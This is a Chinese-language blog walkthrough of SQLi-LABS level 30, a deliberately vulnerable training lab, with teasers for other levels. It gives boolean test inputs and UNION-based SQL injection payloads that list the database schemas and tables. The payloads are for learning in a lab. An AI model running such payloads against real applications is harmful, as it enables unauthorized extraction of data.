开发者社区数据库文章正文

SQLi LABS Less-30

2021-12-31 151

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 第30关使用GET请求传递参数,在url中构造payload即可后端源码中并没有做什么过滤,只是在参数两边添加了双引号

第30关使用GET请求传递参数,在url中构造payload即可

后端源码中并没有做什么过滤,只是在参数两边添加了双引号

输入 1" and true-- a,页面正常显示

输入 1" and false-- a,页面空显示

由此可证明存在SQL注入,注入点为双引号字符型注入

页面中有显示位,可以使用联合注入进行脱库

1. -1" union select 1,2,
2. (select group_concat(schema_name) from information_schema.schemata)
3. -- a

脱表

1. -1" union select 1,2,
2. (select group_concat(table_name) from information_schema.tables
3. where table_schema='security')
4. -- a

文章标签：

SQL

士别三日wyx

SQL 安全数据库

SQLi LABS Less-14

第十四关请求方式为 POST请求 , 注入点为双引号字符串型 , 注入方式为报错注入本次报错注入使用 updatexml()

士别三日wyx

160 0 0

士别三日wyx

数据库

SQLi LABS Less-15

第十五关请求方式为POST请求 , 注入方式为单引号字符串型注入第一步,判断注入类型使用万能账号测试注入类

士别三日wyx

288 0 0

士别三日wyx

SQL

SQLi LABS Less-27

第27关使用GET请求传递参数,在url中构造payload即可源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则

士别三日wyx

358 0 0

zzqsmile

SQL 安全数据库

sqli-labs Less-1

1.首先来到less-1 1.png 2.png 2.请以数字值作为参数输入id。 url后面输入?id=1 3.png 大家可能此时与我不同的是 your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1 这是为了方便我们自己看到底执行的sql语句是什么显示出来的。

zzqsmile

1198 0 0

士别三日wyx

SQL 安全数据库

SQLi-LABS Less-3

第三关请求方式为 GET请求 , 注入点为单引号+括号的字符型注入 , 注入方式为联合注入第一步,判断输入方式

士别三日wyx

171 0 0